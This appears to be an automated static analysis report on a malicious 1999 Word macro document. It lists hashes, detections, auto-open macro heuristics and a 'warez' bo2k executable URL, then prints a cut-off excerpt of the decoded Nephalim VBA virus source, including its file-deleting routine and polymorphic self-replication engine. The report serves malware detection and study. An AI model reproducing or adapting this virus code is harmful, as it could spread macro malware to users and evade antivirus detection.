Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35b27486ead54b0f…

MALICIOUS

Office (OLE)

58.0 KB Created: 1999-11-12 18:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cfe541a52bda36039361cfc8b29d1146 SHA-1: aa8795a3f57ad1a252c2f0bd31459e2fb1b614a4 SHA-256: 35b27486ead54b0f0a508897fd4ce4dd0195c9b54458afda2d5284d23c85249a
362 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including Document_Open and Workbook_Open, which are designed to execute automatically. Critical heuristics indicate the use of Shell() and CreateObject(), suggesting the execution of arbitrary code. The embedded URL 'http://www.bo2k.com/warez/bo2k_1.0.exe' likely points to a secondary payload. ClamAV detections further confirm the malicious nature of the file and its extracted artifact.

Heuristics 8

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.nephilim.com/ In document text (OLE body)
    • http://www.bo2k.com/warez/bo2k_1.0.exeIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72056 bytes
SHA-256: c24d9609751039f5a8652adda3b229fb0e60f9b26e5e1cf1291fa4dd6ba79520
Detection
ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Nephalim v0.93  --  Pre-release version.
'
' Known issues in this release:
'   -Instability on Excel platform
'
Private Sub fDeleteFile(sFileName As String)
On Error Resume Next
If Dir(sFileName) <> "" Then
SetAttr sFileName, 0
Kill sFileName
End If
End Sub
Private Function CreateKey()
On Error Resume Next
Dim iTemp As Integer, sKey As String
sKey = ""
For iTemp = 1 To Int((30 * Rnd) + 6): sKey = sKey + Chr(Int((122 - 65) * Rnd) + 65): Next iTemp
CreateKey = sKey
End Function
Private Function fExposedEngine(sTargetApp As String, sKey As String, iLineCount As Integer)
On Error Resume Next
Dim var(20) As String, eol(20) As String, bond(20) As String, proc_declare(20) As String
Dim sEngine1 As String, sEngine2 As String, sEngine3 As String
Randomize
sTemp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
For iTemp = 1 To 20
poz = Int(Rnd * Len(sTemp)) + 1
var(iTemp) = Mid(sTemp, poz, 1)
sTemp = Left(sTemp, poz - 1) + Right(sTemp, Len(sTemp) - poz)
Select Case Int((4 * Rnd) + 1)
Case 1: bond(iTemp) = ": "
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
Case 2: bond(iTemp) = vbLf
eol(iTemp) = vbLf
proc_declare(iTemp) = "Private "
Case 3: bond(iTemp) = vbLf & vbLf
eol(iTemp) = vbLf & vbLf
proc_declare(iTemp) = "Public "
Case 4: bond(iTemp) = ": Rem " & CreateKey & vbLf
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
End Select
Next iTemp
iSplitNumber1 = 130
iSplitNumber1A = Int(Rnd * iSplitNumber1)
iSplitNumber1B = iSplitNumber1 - iSplitNumber1A
iSplitNumber2 = 32
iSplitNumber2A = Int(Rnd * iSplitNumber2)
iSplitNumber2B = iSplitNumber2 - iSplitNumber2A
iSplitNumber3 = iLineCount
iSplitNumber3A = Int(Rnd * iSplitNumber3)
iSplitNumber3B = iSplitNumber3 - iSplitNumber3A
sObject = var(9) & ".VBProject.VBComponents.Item(" & var(16) & ").CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject1A = "set " & var(10) & " = " & sOne
sSplitObject1B = var(10) & sTwo
sObject = "VBProject.VBComponents.Item(1).CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject2A = "set " & var(13) & " = " & sOne
sSplitObject2B = var(13) & sTwo
sEngine1 = _
"Private Sub " & var(14) & "()" & bond(1) & _
"On Error Resume Next" & bond(2)
Select Case sTargetApp
Case "Excel":  sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Excel.Workbook" & bond(3) & _
"Set " & var(9) & " = Excel.Workbooks.Add" & bond(4) & _
var(16) & " = 4" & bond(5)
Case "Word":  sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Word.Document" & bond(3) & _
"Set " & var(9) & " = Word.Documents.Add" & bond(4) & _
var(16) & " = 1" & bond(5)
End Select
sEngine1 = sEngine1 & _
sSplitObject1A & bond(6) & _
sSplitObject2A & bond(7) & _
var(11) & " = (" & iSplitNumber1A & "+" & iSplitNumber1B & ")" & bond(8) & _
var(12) & " = (" & iSplitNumber2A & "+" & iSplitNumber2B & ")" & bond(9) & _
"For " & var(1) & " = 1 To " & iSplitNumber3A & "+" & iSplitNumber3B & eol(10) & _
var(5) & " = " & sSplitObject2B & "lines(" & var(1) & ", 1)" & bond(11) & _
var(5) & " = right(" & var(5) & ",len(" & var(5) & ")-1)" & bond(12) & _
var(4) & " = """"" & bond(13) & _
var(3) & " = 0" & bond(14) & _
"For " & var(2) & " = 1 To Len(" & var(5) & ")" & eol(15) & _
var(3) & " = " & var(3) & " + 1" & eol(16) & _
"If " & var(3) & " > " & Len(sKey) & "Then " & var(3) & " = 1" & eol(1) & _
var(6) & " = Asc(Mid(" & var(5) & ", " & var(2) & ", 1))" & eol(17) & _
"If " & var(6) & " >= " & var(12) & " And " & var(6) & " <= " & var(11) & " Then" & eol(18)
sEngine2 = _
var(8) & " = Asc(Mid(""" & sKey & """, " & var(3) & ", 1))" & bond(19)
sEngine3 = _
"If " & var(8) & " >
... (truncated)